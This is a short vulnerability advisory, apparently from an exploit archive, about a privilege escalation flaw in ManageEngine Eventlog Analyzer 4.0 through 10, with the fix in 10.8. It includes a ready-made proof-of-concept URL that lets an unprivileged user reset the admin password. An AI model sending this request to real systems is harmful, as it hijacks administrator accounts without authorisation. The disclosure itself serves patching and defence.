ManageEngine Eventlog Analyzer 10 Privilege Escalation
Posted on 31 January 2016
# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation # Exploit Author: @GraphX # Vendor Homepage:http://www.manageengine.com # Version: 4.0 - 10 1. Description: The manageengine eventlog analyzer fails to properly verify user privileges when making changes via the userManagementForm.do. An unprivileged user would be allowed to make changes to any account by changing the USER_ID field to a number corresponding to another user. Testing discovered that the default admin and guest accounts are 1 and 2. Considering the recent similar vulnerabilities discovered in a more current version of a similar product by ManageEngine, it is possible that more versions of the software including current, are vulnerable. According to the vendor this is fixed in version 10.8. 2) Proof of Concept -login as an unprivileged user -Use the following URL to change the admin password to "admin" http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin 3 Solution: Upgrade to 10.8
